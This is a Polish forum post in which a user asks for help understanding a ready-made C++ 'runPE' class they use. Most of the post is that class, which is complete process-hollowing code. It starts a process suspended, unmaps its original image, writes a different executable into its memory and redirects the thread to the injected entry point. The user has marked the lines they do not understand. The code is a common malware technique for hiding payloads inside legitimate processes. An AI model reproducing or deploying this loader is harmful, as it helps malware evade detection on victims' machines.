Witam, proszę o pomoc w objaśnieniu gotowej klasy, pragnę zrozumieć działanie relacji między plikiem a pamięcią i urchamianiem tego wewnątrz na razie używam gotowej klasy lecz nie bardzo ją rozumiem może mi ktoś ją obiaśnić w paru punktach proszę o szczegółowość, wiem że jest dokumentacja msdn ale słabo rozumiem interpretacje
W kodzie zaznaczyłem linie znakami " /////////////////" których nie rozumiem i proszę o interpretacje relacji tego co się dzieje w pamięci a co pobierane i jak jest z pliku

typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);

class runPE{
public:
void run(LPSTR szFilePath, PVOID pFile) 
{
 PIMAGE_DOS_HEADER IDH;   
	PIMAGE_NT_HEADERS INH;   
	PIMAGE_SECTION_HEADER ISH; 
	PROCESS_INFORMATION PI;  
	STARTUPINFOA SI;      
	PCONTEXT CTX;       
	PDWORD dwImageBase;    
	NtUnmapViewOfSection xNtUnmapViewOfSection;
	LPVOID pImageBase;     
	int Count;         
	IDH = PIMAGE_DOS_HEADER(pFile);
	if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
	{
		///////////////////**INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);**
		if (INH->Signature == IMAGE_NT_SIGNATURE)
		{
			RtlZeroMemory(&SI, sizeof(SI));
			RtlZeroMemory(&PI, sizeof(PI));
			if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
			{
			///////////////////////	CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
				CTX->ContextFlags = CONTEXT_FULL;
				**if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))**
				{
					ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
					if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
					{
						xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
						xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
					}
				/////////////////////////////////	pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
					if (pImageBase)
					{
					//////////////////	WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
						for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
						{
					//////////////		ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
						////////////	WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
						}
						WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
					//////////////////	CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
						SetThreadContext(PI.hThread, LPCONTEXT(CTX));
						ResumeThread(PI.hThread);
					}

				}
			}
		}
	}
	VirtualFree(pFile, 0, MEM_RELEASE);
}
};